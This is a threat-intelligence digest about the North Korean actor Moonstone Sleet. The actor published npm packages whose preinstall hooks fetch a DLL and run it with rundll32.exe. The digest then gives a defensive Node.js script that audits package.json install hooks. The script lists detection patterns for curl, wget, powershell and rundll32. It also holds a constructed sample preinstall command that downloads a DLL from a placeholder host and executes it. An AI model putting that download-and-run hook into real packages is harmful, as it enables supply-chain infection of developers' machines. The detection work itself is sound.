August 6, 2024 at 08:06AM
North Korean threat actor Moonstone Sleet is distributing malicious npm packages to infect Windows systems. Security researchers are tracking the threat actor, which is linked to a newly discovered North Korean malicious activity cluster. The actor’s attack chains involve bogus ZIP archives and fake technical skills assessments to deliver malicious payloads. South Korea’s NCSC warned of cyber attacks by North Korean threat groups.
The key takeaways are as follows:
– The threat actor known as Moonstone Sleet has been pushing malicious npm packages to the JavaScript package registry in an attempt to infect Windows systems.
– The packages in question, harthat-api and harthat-hash, were published on July 7, 2024, but were quickly pulled after a short period of time and did not attract any downloads.
– The security arm of a cloud monitoring firm is tracking the threat actor under the name Stressed Pungsan, which exhibits overlaps with a newly discovered North Korean malicious activity cluster dubbed Moonstone Sleet.
– The malicious packages reuse code from the well-known GitHub repository node-config. The actor has also disseminated bogus ZIP archive files via LinkedIn and freelancing websites to entice prospective targets into executing payloads.
– Moonstone Sleet has also been attempting to spread its packages through the npm registry. The packages are designed to run a pre-install script specified in package.json that contacts an external server to download a DLL file, which is then side-loaded using the rundll32.exe binary. The rogue DLL, for its part, does not perform any malicious actions, suggesting either a trial run of the payload delivery infrastructure or that the package was inadvertently pushed to the registry before malicious code was embedded in it.
– South Korea’s National Cyber Security Center (NCSC) has warned of cyber attacks mounted by North Korean threat groups tracked as Andariel and Kimsuky to deliver malware families such as Dora RAT and TrollAgent (aka Troll Stealer) as part of intrusion campaigns aimed at construction and machinery sectors in the country.
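The npm lifecycle hook described above (a pre-install script that fetches a DLL and launches it with rundll32.exe) is the part of this activity a defender can check for mechanically. The following Node.js script is an added example, not code from the article, from Datadog/Microsoft, or from the packages named above: it parses a package.json manifest, lists every install-time hook, and flags commands that fetch from the network, launch rundll32 or a shell interpreter, or embed a remote URL. The sample manifest, its package name and URL are constructed for illustration.

```javascript
// Added example (not from the article or the packages it names): audit a
// package.json for install-time lifecycle hooks that behave like the one the
// article describes. The sample manifest below is constructed.

// npm lifecycle scripts that run automatically during `npm install`.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare', 'prepublish'];

// Indicators a defender would flag inside an install hook. rundll32.exe is the
// launcher named in the article; the rest are generic download/execute tells.
const SUSPICIOUS_PATTERNS = [
  { name: 'rundll32', re: /rundll32(\.exe)?/i },
  { name: 'network-fetch', re: /\b(curl|wget|Invoke-WebRequest|iwr|certutil)\b/i },
  { name: 'shell-interpreter', re: /\b(powershell|cmd\.exe|bash|sh)\b/i },
  { name: 'node-eval', re: /\bnode\s+-e\b/i },
  { name: 'remote-url', re: /https?:\/\/[^\s"']+/i },
];

// Returns { name, findings, riskyHooks }. Each finding lists the hook, its
// command string and the indicator names that matched.
function auditInstallScripts(manifestText) {
  const manifest = JSON.parse(manifestText);
  const scripts = manifest.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    if (!Object.prototype.hasOwnProperty.call(scripts, hook)) continue;
    const command = String(scripts[hook]);
    const indicators = SUSPICIOUS_PATTERNS
      .filter((p) => p.re.test(command))
      .map((p) => p.name);
    findings.push({ hook, command, indicators, risky: indicators.length > 0 });
  }
  return {
    name: manifest.name,
    findings,
    riskyHooks: findings.filter((f) => f.risky).map((f) => f.hook),
  };
}

// Constructed manifest mirroring the pattern in the article: a preinstall
// hook that downloads a DLL and runs it via rundll32.exe. Name and URL are
// placeholders, not the real packages or infrastructure.
const SAMPLE_MANIFEST = JSON.stringify({
  name: 'example-pkg',
  version: '1.0.0',
  scripts: {
    preinstall: 'curl -o ./lib.dll https://example.invalid/lib.dll && rundll32.exe ./lib.dll,Start',
    test: 'node test.js',
  },
});

console.log(JSON.stringify(auditInstallScripts(SAMPLE_MANIFEST), null, 2));
```

Run it before installing an untrusted package (or over every package.json under node_modules after a dry-run install). A cheaper blanket control is to set `ignore-scripts=true` in .npmrc so lifecycle hooks never run by default; native modules that genuinely need a build step can then be allowed individually.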